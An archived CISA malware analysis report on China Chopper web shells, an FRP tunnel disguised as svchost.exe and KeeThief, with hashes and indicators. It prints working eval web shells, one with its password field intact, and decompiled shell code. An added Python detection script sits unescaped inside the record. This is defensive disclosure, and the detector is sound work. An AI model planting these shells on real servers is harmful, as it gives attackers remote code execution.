{
	"id": "e9af4371-de48-4b6b-b293-bc406931a3b3",
	"created_at": "2026-04-06T01:32:35.180619Z",
	"updated_at": "2026-04-10T03:21:46.806734Z",
	"deleted_at": null,
	"sha1_hash": "72d04d5e11286840e3d04797b04757cc62fc9b7d",
	"title": "MAR-10297887-1.v2 – Iranian Web Shells | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 127224,
	"plain_text": "MAR-10297887-1.v2 – Iranian Web Shells | CISA\r\nPublished: 2020-11-02 · Archived: 2026-04-06 00:52:41 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial\r\nproduct or service referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.\r\nSummary\r\nDescription\r\nThe Iran-based malicious cyber actor associated with this report is known to target the information technology,\r\ngovernment, healthcare, financial, and insurance sectors across the US. The threat actor has been observed exploiting\r\nseveral publicly known Common Vulnerabilities and Exposures (CVEs) affecting Pulse Secure virtual private network\r\n(VPN), Citrix NetScaler, and F5 products. Once the actor exploits these vulnerabilities, open source web shells and/or\r\nmodified versions of those web shells are used to further entrench into the victim network. The web shells are publicly known as\r\nthe ChunkyTuna, Tiny, and China Chopper web shells.\r\nThis product details the functionality of 18 malicious files, including multiple components of the China Chopper web shell,\r\namong them an ASP.NET (Active Server Pages) page that listens for incoming Hypertext Transfer Protocol (HTTP)\r\nrequests from a remote operator. The China Chopper web shell allows the operator to pass JavaScript (JScript.NET)\r\ncode to a victim's system for execution. 
The report also details additional China Chopper web shell components that give the operator\r\nmore specific command and control (C2) capabilities, including the ability to enumerate directories, upload and execute\r\nadditional payloads, and exfiltrate data.\r\nIn addition, a program database (PDB) file and a binary, which has been identified as a compiled version of the open source\r\nproject known as \"FRP\", were also analyzed. FRP allows an adversary to tunnel various types of connections to a remote\r\noperator sitting outside of the victim's network perimeter. A PowerShell script that is part of the open source project\r\nknown as \"KeeThief\" was also analyzed. This code allows the operator to access the encrypted password credentials\r\nstored by the \"KeePass\" password management software.\r\nIt appears this adversary utilized these malicious tools to maintain persistent remote access to, and exfiltrate data from, the\r\nvictim's network. The adversary may have used the \"FRP\" utility to tunnel Remote Desktop Protocol (RDP) sessions over an\r\noutbound connection, allowing persistent access to the network from outside the firewall perimeter. The China Chopper web shell also\r\nprovides the persistent ability to navigate throughout the victim's network from inside the perimeter. Leveraging the\r\n\"KeeThief\" utility allows access to sensitive user password credentials and potentially the ability to pivot to user accounts\r\noutside of the victim's network.\r\nAn additional 7 files contain malicious PHP (Hypertext Preprocessor) code designed to function as malicious web shells,\r\nwhich were identified as ChunkyTuna and Tiny web shells. 
The purpose of these web shells is to accept commands and data\r\nfrom a remote operator, providing the operator C2 capabilities over a compromised system.\r\nSubmitted Files (17)\r\n134ef25d48b8873514f84a0922ec9d835890bda16cc7648372e014c1f90a4e13 (site.aspx)\r\n17f5b6d74759620f14902a5cc8bba8753df8a17da33f4ea126b98c7e2427e79c (vti_cnf.aspx.33154034.compiled)\r\n28bc161df8406a6acf4b052a986e29ad1f60cbb19983fc17931983261b18d4ea (App_Web_tcnma5bs.pdb)\r\n2944ea7d0045a1d64f3584e5803cbf3a026bd0e22bdf2e4ba1d28c6ad9e57849 (prev_sh)\r\n3b14d5eafcdb9e90326cb4146979706c85a58be3fc4706779f0ae8d744d9e63c (content)\r\n4a1fc30ffeee48f213e256fa7bff77d8abd8acd81e3b2eb3b9c40bd3e2b04756 (content)\r\n51e9cadeab1b33260c4ccb2c63f5860a77dd58541d7fb0840ad52d0a1abedd21 (df5bd34799e200951fcce77c1c0b42...)\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 1 of 26\n\n547440bd037a149ac7ac58bc5aaa65d079537e7a87dc93bb92edf0de7648761c (df5bd34799e200951fcce77c1c0b42...)\r\n553f355f62c4419b808e078f3f71f401f187a9ac496b785e81fbf087e02dc13f (ui-bg.aspx)\r\n55b9264bc1f665acd94d922dd13522f48f2c88b02b587e50d5665b72855aa71c (svchost.exe)\r\n5e0457815554574ea74b8973fc6290bd1344aac06c1318606ea4650c21081f0a (App_Web_tcnma5bs.0.js)\r\n8c9aeedeea37ee88c84b170d9cd6c6d83581e3a57671be0ba19f2c8a17bd29f3 (content)\r\n913ee2b048093162ff54dca050024f07200cdeaf13ffd56c449acb9e6d5fbda0 (kee.ps1)\r\n99344d862e9de0210f4056bdf4b8045ab9eabe1a62464d6513ed16208ab068fc (App_Web_tcnma5bs.dll)\r\nb36288233531f7ac2e472a689ff99cb0f2ac8cba1b6ea975a9a80c1aa7f6a02a (tiny_webshell)\r\nb443032aa281440017d1dcc3ae0a70d1d30d4f2f2b3f064f95f285e243559249 (df5bd34799e200951fcce77c1c0b42...)\r\nf7ddf2651faf81d2d5fe699f81315bb2cf72bb14d74a1c891424c6afad544bde (dllhost.dll)\r\nAdditional Files (1)\r\n10836bda2d6a10791eb9541ad9ef1cb608aa9905766c28037950664cd64c6334 (KeeTheft.dll)\r\nFindings\r\n553f355f62c4419b808e078f3f71f401f187a9ac496b785e81fbf087e02dc13f\r\nTags\r\ntrojanwebshell\r\nDetails\r\nName ui-bg.aspx\r\nSize 178 
bytes\r\nType ASCII text, with no line terminators\r\nMD5 d7b7a8c120b69166643ee05bf70b37e5\r\nSHA1 2ac99374cab70f8be83c48bbf3258eae78676f65\r\nSHA256 553f355f62c4419b808e078f3f71f401f187a9ac496b785e81fbf087e02dc13f\r\nSHA512 8c51c9e3d3d39ec7b961482ed7fc8cde1804ef126b72fce270c6891f64f4371067a65a8be1cbab1ab3c8860a3e2ea206d274f064d54cf2605ff\r\nssdeep 3:aEwJkW9uck1SLxAdRLgyKBM2aBZBQ/tZ/LmKABXXKF2xKYA5eRtGnKRHBIwLWEDp:aEm7EnLgyKBM5Y/tZ6KCHKF2xK\r\nEntropy 5.196436\r\nAntivirus\r\nESET ASP/Webshell.T trojan\r\nSophos Troj/WebShel-F\r\nSymantec Hacktool.Jsprat\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file is a small ASP.NET page written in JScript, which contains the following code:\r\n—Begin JavaScript Code—\r\n\u003c%@ Page Language=\"Jscript\"%\u003e\u003c%try\r\n{\r\neval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(Request.Item[\"\r\n[Redacted]\"])),\"unsafe\");\r\n}\r\ncatch(e)\r\n{\r\n}\r\n—End JavaScript Code—\r\nAnalysis indicates this file might serve as part of a larger application. The code reads one field of the incoming HTTP\r\nrequest (\"Request.Item\", indexed by a redacted parameter name that functions as the operator's password), Base64 decodes\r\nit as UTF-8 (code page 65001), and executes the result with the JScript \"eval\" function using the \"unsafe\" option, which\r\nlifts the restrictions JScript .NET normally places on evaluated code. The code to run is therefore supplied by the remote\r\noperator in each HTTP request rather than stored on disk, and any exception is silently discarded by the empty catch block. 
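As an added example that is not code from the CISA report, the following Python recognises this eval one-liner in ASPX source and recovers the operator's JScript from a captured request body. The page contents and the request body are constructed here; the parameter name "ammashnist" is the one printed in the site.aspx listing that follows, and the payload inside the sample request is a placeholder chosen for the example.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import parse_qs

# Matches the JScript one-liner used by ui-bg.aspx, site.aspx and the compiled
# _vti_cnf.aspx: eval() of a Base64-decoded request field, run with the "unsafe"
# flag. Whitespace and the field name are free, so the redacted variant (whose
# field name spans a line break in the report) and "ammashnist" both match, and
# both Request.Item[...] and Request[...] spellings are accepted.
CHOPPER_RE = re.compile(
    r"eval\s*\(\s*System\.Text\.Encoding\.GetEncoding\s*\(\s*65001\s*\)\s*\.GetString\s*\(\s*"
    r"System\.Convert\.FromBase64String\s*\(\s*Request(?:\.Item)?\s*\[\s*[\"']([^\"']+)[\"']\s*\]"
    r"\s*\)\s*\)\s*,\s*[\"']unsafe[\"']\s*\)",
    re.IGNORECASE | re.DOTALL,
)
JSCRIPT_DIRECTIVE_RE = re.compile(r"<%@\s*Page\s+Language\s*=\s*[\"']Jscript[\"']", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    path: str
    parameter: str      # the request field name is the operator's "password"
    jscript_page: bool  # True when the file also carries the Jscript page directive


def scan_aspx(path: str, text: str) -> List[Finding]:
    """Return one Finding per China Chopper-style eval one-liner found in text."""
    is_jscript = bool(JSCRIPT_DIRECTIVE_RE.search(text))
    return [Finding(path, m.group(1), is_jscript) for m in CHOPPER_RE.finditer(text)]


def decode_chopper_request(body: str, parameter: str) -> Optional[str]:
    """Recover the JScript the operator sent, given a captured form-encoded body."""
    values = parse_qs(body, keep_blank_values=True).get(parameter)
    if not values:
        return None
    raw = values[0]
    # The shell's FromBase64String rejects bad padding; tolerate it here because
    # captured bodies are sometimes truncated by the proxy or sensor.
    raw += "=" * (-len(raw) % 4)
    try:
        return base64.b64decode(raw).decode("utf-8", errors="replace")
    except ValueError:
        return None


# Constructed samples (not the report's files): the 178-byte shell shape with the
# field name from the site.aspx listing, and an ordinary page for comparison.
SAMPLE_SHELL = (
    '<%@ Page Language="Jscript"%><%try{eval(System.Text.Encoding.GetEncoding(65001)'
    '.GetString(System.Convert.FromBase64String(Request.Item["ammashnist"])),"unsafe");}'
    'catch(e){}%>'
)
SAMPLE_BENIGN = '<%@ Page Language="C#" AutoEventWireup="true" %><html><body>Status: OK</body></html>'

# Constructed capture of one operator request: the field carries Base64 JScript.
# The payload text is a placeholder, not one observed in the report.
SAMPLE_PAYLOAD = 'Response.Write(Server.MapPath("."));'
SAMPLE_BODY = "ammashnist=" + (
    base64.b64encode(SAMPLE_PAYLOAD.encode()).decode().replace("+", "%2B").replace("=", "%3D")
)


def demo() -> dict:
    """Scan both samples, then decode the captured request with the discovered field name."""
    findings = scan_aspx("ui-bg.aspx", SAMPLE_SHELL) + scan_aspx("index.aspx", SAMPLE_BENIGN)
    decoded = decode_chopper_request(SAMPLE_BODY, findings[0].parameter) if findings else None
    return {"findings": findings, "decoded": decoded}


if __name__ == "__main__":
    result = demo()
    for f in result["findings"]:
        print(f"{f.path}: eval one-liner, field {f.parameter!r}, jscript_page={f.jscript_page}")
    print("operator payload:", result["decoded"])
```

The regex is deliberately anchored on the full decode-then-eval chain rather than on "eval" alone, so ordinary JScript pages do not trip it; pair it with IIS logs filtered for POST requests to .aspx files under aspnet_client to find the operator's traffic once a field name is known.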
It is believed this script is a component of the China Chopper web shell\r\nframework.\r\n134ef25d48b8873514f84a0922ec9d835890bda16cc7648372e014c1f90a4e13\r\nTags\r\ntrojanwebshell\r\nDetails\r\nName site.aspx\r\nSize 178 bytes\r\nType ASCII text, with no line terminators\r\nMD5 20d89fa1df155632fafb2c9fe1a6a038\r\nSHA1 c9cf494475de81dae5a2c54c678b4a518f46b1fe\r\nSHA256 134ef25d48b8873514f84a0922ec9d835890bda16cc7648372e014c1f90a4e13\r\nSHA512 c1d485e34153c50af79e719c4100b988ba4d289578d385d0b30d2225c20b4b8f715d215f609a141030489a337ff36a89b23d4e99bf1895466\r\nssdeep 3:aEwJkW9uck1SLxAdRLgyKBM2aBZBQ/tZ/LmKABXXKF2xKYA5eRtJIIDYbwLWEDvR:aEm7EnLgyKBM5Y/tZ6KCHKF2xKt5\r\nEntropy 5.201321\r\nAntivirus\r\nESET ASP/Webshell.T trojan\r\nSophos Troj/WebShel-F\r\nSymantec Hacktool.Jsprat\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file is a small ASP.NET page written in JScript, which contains the following embedded code:\r\n—Begin Embedded JavaScript—\r\n\u003c%@ Page Language=\"Jscript\"%\u003e\u003c%try\r\n{\r\neval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(Request.Item[\"ammashnist\"])),\"unsafe\");\r\n}\r\ncatch(e)\r\n{\n}\n—End Embedded JavaScript—\nThis script reads the \"ammashnist\" field of the incoming HTTP request, Base64 decodes it, and executes the result as JScript;\nthe field name serves as the password for the shell. The contents of\nthe JavaScript code submitted through that field were not available for analysis. 
It is believed this web shell is a component of the China\nChopper web shell framework.\n17f5b6d74759620f14902a5cc8bba8753df8a17da33f4ea126b98c7e2427e79c\nTags\nwebshell\nDetails\nName vti_cnf.aspx.33154034.compiled\nSize 408 bytes\nType XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators\nMD5 de1cd1c54711544508d157214323af85\nSHA1 c33a07965e06280c53e19a5d093983205433843f\nSHA256 17f5b6d74759620f14902a5cc8bba8753df8a17da33f4ea126b98c7e2427e79c\nSHA512 8265901a684f808c612f9cfcc486aaba923e2cf8ca7fdcd3071e786ad6030c067c4147b7b4e36bb271a5f2b36e0c3f487ceb259e2f00e6afd90\nssdeep 12:MMHdWFV2q6sX1rMxA0UH17I2fUQ/1OifV2q6sW6/1:JdmsvkrGOnfUcBsve/1\nEntropy 5.120655\nAntivirus\nNo matches found.\nYARA Rules\nNo matches found.\nssdeep Matches\nNo matches found.\nDescription\nThis file is a “.compiled” file which was generated during the compilation of an ASP.NET application. It is believed this file\nwas generated during the compilation and execution of a China Chopper web shell application. Although this file cannot be\nexecuted, its presence may be considered an indicator of compromise. 
The file contains the following data.\n—Begin Data—\n\u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\n—End Data—\n5e0457815554574ea74b8973fc6290bd1344aac06c1318606ea4650c21081f0a\nTags\nwebshell\nDetails\r\nName App_Web_tcnma5bs.0.js\r\nSize 8401 bytes\r\nType UTF-8 Unicode (with BOM) text, with CRLF line terminators\r\nMD5 8495abfd7356f75ad7006d2ab42d4bee\r\nSHA1 3736a085f9fe515dc7d12bbf2a1474bdd3d8d4d2\r\nSHA256 5e0457815554574ea74b8973fc6290bd1344aac06c1318606ea4650c21081f0a\r\nSHA512 8c5fec8455ad0d529030f19626b8fe55b05f6f24b4fee1378e2d6ffa7185c5f2854074cfc30518721892f39985dc5742e81f875d5469101967a\r\nssdeep 192:VkjEVXTaaVEDAQpovRpY0NHMdWoEsxpKL:VkjEVXTaaEDAQM3NHMdJEIp4\r\nEntropy 5.246768\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file is the JScript.NET source that ASP.NET generated when it compiled the _vti_cnf.aspx page, and it has been\r\nidentified as a component of a malicious web shell. The script has been tentatively identified as a\r\nvariant of the China Chopper web shell. 
Displayed below is the partial JavaScript application extracted from this script:\r\n—Begin Partial JavaScript—\r\npackage ASP {\r\n      public System.Runtime.CompilerServices.CompilerGlobalScopeAttribute()\r\n   class aspnet_client_system_web_4_0_30319__vti_cnf_aspx extends System.Web.UI.Page implements\r\nSystem.Web.SessionState.IRequiresSessionState, System.Web.IHttpHandler {\r\n              private static var __initialized : boolean;\r\n              private static var __fileDependencies : System.Object;\r\n              public System.Diagnostics.DebuggerNonUserCodeAttribute() function\r\naspnet_client_system_web_4_0_30319__vti_cnf_aspx() {\r\n           var dependencies : System.String[];\r\n           System.Web.UI.Page(this).AppRelativeVirtualPath = \"~/aspnet_client/system_web/4_0_30319/_vti_cnf.aspx\";\r\n           if ((ASP.aspnet_client_system_web_4_0_30319__vti_cnf_aspx.__initialized == false)) {\r\n               dependencies = new System.String[1];\r\n               dependencies[0] = \"~/aspnet_client/system_web/4_0_30319/_vti_cnf.aspx\";\r\n               ASP.aspnet_client_system_web_4_0_30319__vti_cnf_aspx.__fileDependencies =\r\nthis.GetWrappedFileDependencies(dependencies);\r\n               ASP.aspnet_client_system_web_4_0_30319__vti_cnf_aspx.__initialized = true;\r\n           }\r\n           this.Server.ScriptTimeout = 30000000;\r\n                  }\r\n              protected final function get Profile() : System.Web.Profile.DefaultProfile {\r\n           return System.Web.Profile.DefaultProfile(this.Context.Profile);\r\n       }\r\n              protected override function get SupportAutoEvents() : boolean {\r\n           return false;\r\n       }\r\n              protected final function get ApplicationInstance() : ASP.global_asax {\r\n           return ASP.global_asax(this.Context.ApplicationInstance);\r\n       }\r\n              private final 
System.Diagnostics.DebuggerNonUserCodeAttribute() function __BuildControlTree(__ctrl :\r\naspnet_client_system_web_4_0_30319__vti_cnf_aspx) {\r\n                      //@cc_on\r\n           //@set @position(file=\"F:\\\\inetpub\\\\wwwroot\\\\\\\\aspnet_client\\\\system_web\\\\4_0_30319\\\\_vti_cnf.aspx\";line=1)\r\n           this.InitializeCulture();\r\n                      //@set @position(end)\r\n           __ctrl.SetRenderMethodDelegate(System.Web.UI.RenderMethod(this.__Render__control1));\r\n       }\r\n              private final function __Render__control1(__w : System.Web.UI.HtmlTextWriter, parameterContainer :\r\nSystem.Web.UI.Control) {\r\n                      //@cc_on\r\n           //@set @position(file=\"F:\\\\inetpub\\\\wwwroot\\\\\\\\aspnet_client\\\\system_web\\\\4_0_30319\\\\_vti_cnf.aspx\";line=1)\r\n                            try\r\n{eval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(Request.Item[\"\r\n[Redacted]\"])),\"unsafe\"); } catch(e) {}\r\n                      //@set @position(end)\r\n       }\r\n—End Partial JavaScript—\r\nAnalysis indicates it is designed to operate as a web server and accept JavaScript code provided from a remote operator. 
The request field name, which serves as the password a remote operator must supply to use this web shell, was redacted.\r\n99344d862e9de0210f4056bdf4b8045ab9eabe1a62464d6513ed16208ab068fc\r\nTags\r\nwebshell\r\nDetails\r\nName App_Web_tcnma5bs.dll\r\nSize 13312 bytes\r\nType PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows\r\nMD5 18f2cf11b940a62d63fd757e20564ec6\r\nSHA1 6fbd38aff374974c59ccca7efd8e1a3205c69ce9\r\nSHA256 99344d862e9de0210f4056bdf4b8045ab9eabe1a62464d6513ed16208ab068fc\r\nSHA512 190c3cb0a09ce111135d0a98d10922650c28eb895583d98b2015b67e71a2131f824863cb4402d7627648aa0660ad5eaab63ed7cae8a9a546\r\nssdeep 384:4PojaxtaTXMzS/X44tIItLzxqIj3tccsJY5Ohmqw/4JHuNkLpe+k:4PojaxyXM+/X44K2\r\nEntropy 5.143850\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2020-06-07 06:21:21-04:00\r\nImport Hash dae02f32a21e03ce65412f6e56942daa\r\nCompany Name  \r\nFile Description  \r\nInternal Name App_Web_tcnma5bs.dll\r\nLegal Copyright  \r\nOriginal Filename App_Web_tcnma5bs.dll\r\nProduct Name  \r\nProduct Version  \r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n83b4ba5ffed3f61f2c3c07cbfb9e4645 header 512 2.606561\r\n9f9a21c74d71b03386ee22a566a1170d .text 11264 5.517535\r\ncb5b712bb6ddf459a6a953c98373b5f6 .rsrc 1024 2.512896\r\ndbd0e57bcdedc0733290c5195a01ad35 .reloc 512 0.081539\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C# v7.0 / Basic .NET\r\nRelationships\r\n99344d862e... Related_To 28bc161df8406a6acf4b052a986e29ad1f60cbb19983fc17931983261b18d4ea\r\nDescription\r\nThis file is a compiled Windows .NET dynamic link library (DLL), the assembly ASP.NET produced from the _vti_cnf.aspx\r\npage. It has been identified as a component of a malicious web shell and has been tentatively identified as a variant of the\r\nChina Chopper web shell. The DLL contains the compiled form of the malicious JScript code. 
A portion of the decompiled code (rendered as C# by the decompiler) for the embedded JScript is\r\ndisplayed below:\r\n—Begin Extracted Code—\r\nprivate void __Render__control1(HtmlTextWriter __w, Control parameterContainer)\r\n   {\r\n    // ISSUE: type reference\r\n    // ISSUE: type reference\r\n    // ISSUE: type reference\r\n    Microsoft.JScript.StackFrame.PushStackFrameForMethod((object) this, new JSLocalField[3]\r\n    {\r\n       new JSLocalField(nameof (__w), __typeref (HtmlTextWriter), 0),\r\n       new JSLocalField(nameof (parameterContainer), __typeref (Control), 1),\r\n       new JSLocalField(\"e:6\", __typeref (object), 2)\r\n    }, ((INeedEngine) this).GetEngine());\r\n    try\r\n    {\r\n       object obj1;\r\n       try\r\n       {\r\n        object[] localVars1 = ((Microsoft.JScript.StackFrame) ((INeedEngine)\r\nthis).GetEngine().ScriptObjectStackTop()).localVars;\r\n        localVars1[0] = (object) __w;\r\n        localVars1[1] = (object) parameterContainer;\r\n        object obj2;\r\n        localVars1[2] = obj2;\r\n        Eval.JScriptEvaluate((object)\r\nEncoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(this.Request[\"[Redacted]\"])), ((INeedEngine)\r\nthis).GetEngine());\r\n        object[] localVars2 = ((Microsoft.JScript.StackFrame) ((INeedEngine)\r\nthis).GetEngine().ScriptObjectStackTop()).localVars;\r\n        __w = (HtmlTextWriter) localVars2[0];\r\n        parameterContainer = (Control) localVars2[1];\r\n        obj1 = localVars2[2];\r\n       }\r\n       catch (Exception ex)\r\n       {\r\n        VsaEngine engine = ((INeedEngine) this).GetEngine();\r\n        obj1 = Try.JScriptExceptionValue((object) ex, engine);\r\n       }\r\n       object[] localVars = ((Microsoft.JScript.StackFrame) ((INeedEngine)\r\nthis).GetEngine().ScriptObjectStackTop()).localVars;\r\n       localVars[0] = (object) __w;\r\n       localVars[1] = (object) parameterContainer;\r\n       
localVars[2] = obj1;\r\n    }\r\n    finally\r\n    {\r\n       ((INeedEngine) this).GetEngine().PopScriptObject();\r\n    }\r\n—End Extracted Code—\r\nThe request field name used as the password to access this web shell was redacted. This implant allows a\r\nremote operator to execute JavaScript payloads on a victim's system.\r\n28bc161df8406a6acf4b052a986e29ad1f60cbb19983fc17931983261b18d4ea\r\nTags\r\nwebshell\r\nDetails\r\nName App_Web_tcnma5bs.pdb\r\nSize 24064 bytes\r\nType MSVC program database ver 7.00, 512*47 bytes\r\nMD5 3be9b7030389ad5e106f169fbe7b7458\r\nSHA1 224448b5840b71ca07c144d3f525b8971c17d4a7\r\nSHA256 28bc161df8406a6acf4b052a986e29ad1f60cbb19983fc17931983261b18d4ea\r\nSHA512 bf8b7bc82be4803099cfe956edb2699c441705955e4d7e3822501940a8e572dafcf1906c797cea8551f3407059bad03c9196bd1432038c095\r\nssdeep 384:ihIBU3Xo3Z3oTTi3aljxTi3aljKITi3aljs8Ti3aljUTi3aljBTi3alj1Ti3aljb:ihIBU4Zox1fLOx5H1bX0b6UW\r\nEntropy 3.924351\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\n28bc161df8... Related_To 99344d862e9de0210f4056bdf4b8045ab9eabe1a62464d6513ed16208ab068fc\r\nDescription\r\nThis file is a program database (PDB) file. This file correlates with compilation of the application named\r\n\"App_Web_tcnma5bs.dll\" (99344d862e9de0210f4056bdf4b8045ab9eabe1a62464d6513ed16208ab068fc). Although this file\r\ncannot be executed, its presence may be considered an indicator of compromise. 
Strings of interest extracted from this PDB\r\nfile are displayed below. The source path embedded in the PDB shows the page was deployed under the IIS web root in the\r\naspnet_client\\system_web\\4_0_30319 directory, a location that exists on servers with ASP.NET installed and so blends in\r\nwith legitimate files:\r\n—Begin Strings of Interest—\r\nF:\\inetpub\\wwwroot\\\\aspnet_client\\system_web\\4_0_30319\\_vti_cnf.aspx\r\nf:\\inetpub\\wwwroot\\\\aspnet_client\\system_web\\4_0_30319\\_vti_cnf.aspx\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\web.config\r\nc:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\web.config\r\n.ctor\r\nGlobal Code\r\nSystem\r\nSystem.Collections\r\nSystem.Text\r\nSystem.Web.UI\r\nSystem.Collections.Generic\r\nSystem.Text.RegularExpressions\r\nSystem.Xml.Linq\r\nSystem.Web.SessionState\r\nSystem.Web.Helpers\r\nSystem.Web.Routing\r\nSystem.Configuration\r\nSystem.Collections.Specialized\r\nSystem.Linq\r\nSystem.Web\r\nSystem.Web.DynamicData\r\nSystem.Web.Caching\r\nSystem.Web.Profile\r\nSystem.ComponentModel.DataAnnotations\r\nSystem.Web.UI.WebControls\r\nSystem.Web.Mvc.Ajax\r\nSystem.Web.Security\r\nSystem.Web.Mvc\r\nSystem.Web.UI.WebControls.WebParts\r\nSystem.Web.WebPages\r\nSystem.Web.Mvc.Html\r\nSystem.Web.UI.HtmlControls\r\nget_Profile\r\nASP\r\nSystem\r\nSystem.Collections\r\nSystem.Text\r\nSystem.Web.UI\r\nSystem.Collections.Generic\r\nSystem.Text.RegularExpressions\r\nSystem.Xml.Linq\r\nSystem.Web.SessionState\r\nSystem.Web.Helpers\r\nSystem.Web.Routing\r\nSystem.Configuration\r\nSystem.Collections.Specialized\r\nSystem.Linq\r\nSystem.Web\r\nSystem.Web.DynamicData\r\nSystem.Web.Caching\r\nSystem.Web.Profile\r\nSystem.ComponentModel.DataAnnotations\r\nSystem.Web.UI.WebControls\r\nSystem.Web.Mvc.Ajax\r\nSystem.Web.Security\r\nSystem.Web.Mvc\r\nSystem.Web.UI.WebControls.WebParts\r\nSystem.Web.WebPages\r\nSystem.Web.Mvc.Html\r\nSystem.Web.UI.HtmlControls\r\nget_SupportAutoEvents\r\nGetEngine\r\n0600000d\r\nSetEngine\r\n0600000e\r\nASP.aspnet_client_system_web_4_0_30319__vti_cnf_aspx\r\n87986BFE\r\n__ASP.FastObjectFactory_app_web_tcnma5bs\r\n35A8BE76\r\nJScript 
0\r\n1F3114D0\r\nJScript 1\r\n062A2591\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\web.config\r\nF:\\inetpub\\wwwroot\\\\aspnet_client\\system_web\\4_0_30319\\_vti_cnf.aspx\r\nT[@\r\n/LinkInfo\r\n/names\r\n/src/headerblock\r\n/src/files/f:\\inetpub\\wwwroot\\\\aspnet_client\\system_web\\4_0_30319\\_vti_cnf.aspx\r\n/src/files/c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\web.config\r\n—End Strings of Interest—\r\n55b9264bc1f665acd94d922dd13522f48f2c88b02b587e50d5665b72855aa71c\r\nTags\r\nproxywebshell\r\nDetails\r\nName svchost.exe\r\nSize 10532864 bytes\r\nType PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 c8bc262d7126c3399baaec3bee89d542\r\nSHA1 c94a0f902b3b8cc4ca5e4cc9004ac9eaa4614699\r\nSHA256 55b9264bc1f665acd94d922dd13522f48f2c88b02b587e50d5665b72855aa71c\r\nSHA512 cf7b89d9658e618cb4f590b13bd6a6e5abcba0cddca625c7aeaaafb5ef8821a7a60620b789de4abd5d4505ffe3e9c13ad3bf1173f21e1735df5\r\nssdeep 196608:3YHvhq3/BuNnKkOeXtqugiGk9FPHxgc/uA63+w0IUX:kQBuVku1G+\r\nEntropy 6.107183\r\nAntivirus\r\nK7 Riskware ( 0040eff71 )\r\nSophos App/FRProxy-A\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash 91802a615b3a5c4bcc05bc5f66a5b219\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n86ff3a53ecd56eaa856f8c7c28d0a8f1 header 1536 1.263684\r\n26ef590b60778bfdd9bfcbb24d832f94 .text 4546560 5.826487\r\nabdb24e1a410aa5fba49a4d1fe6a21bb .rdata 5612032 5.660454\r\n2e993dbff4bcb21d52aa1897a4e2604e .data 370688 6.023192\r\nf006061c21d3eee457ffe5e2c69cba8e .idata 1536 3.442601\r\n07b5472d347d42780469fb2654b7fc54 .symtab 512 0.020393\r\nDescription\r\nThis file is a compiled version of the open source utility named FRP (fast reverse proxy), a Go program, which is consistent\r\nwith the .symtab section, the zeroed compile timestamp, and the roughly 10 MB size. Its file name mimics the legitimate\r\nWindows Service Host process, svchost.exe. 
FRP is an administration tool in which a client running on a system\r\nbehind a router or firewall performing Network Address Translation (NAT) connects outbound to an FRP server and exposes\r\nlocal services through that server to systems or operators located outside of the victim's network. For example, the\r\nutility can tunnel Secure Shell (SSH) protocol connections from an inside system protected by a firewall and router to a\r\nsystem outside of the firewall perimeter.\r\nf7ddf2651faf81d2d5fe699f81315bb2cf72bb14d74a1c891424c6afad544bde\r\nTags\r\nwebshell\r\nDetails\r\nName dllhost.dll\r\nSize 226 bytes\r\nType ASCII text, with CRLF line terminators\r\nMD5 14df2e509b6ee8deb3ce6ba3b88e3de0\r\nSHA1 80190bdddf70a79a1735136f81309219c937458d\r\nSHA256 f7ddf2651faf81d2d5fe699f81315bb2cf72bb14d74a1c891424c6afad544bde\r\nSHA512 6a32f2715d554c11eb0a50e39540c9e68bbb387b8a3aa1dfe4604ce6ed22a075fae0c1b3dfd07468746f4d782b1bff203f9036acaff9d6bbd2a\r\nssdeep 6:eBh3BnEWovv5O4WaundbHAVSVDOUqxTWi:enlcO4WhcSVHqxii\r\nEntropy 5.081345\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nDespite its name and extension, this file is plain text: an INI-style configuration for the FRP client (frpc), which may be\r\nutilized with the FRP binary named \"svchost.exe\"\r\n(55b9264bc1f665acd94d922dd13522f48f2c88b02b587e50d5665b72855aa71c). 
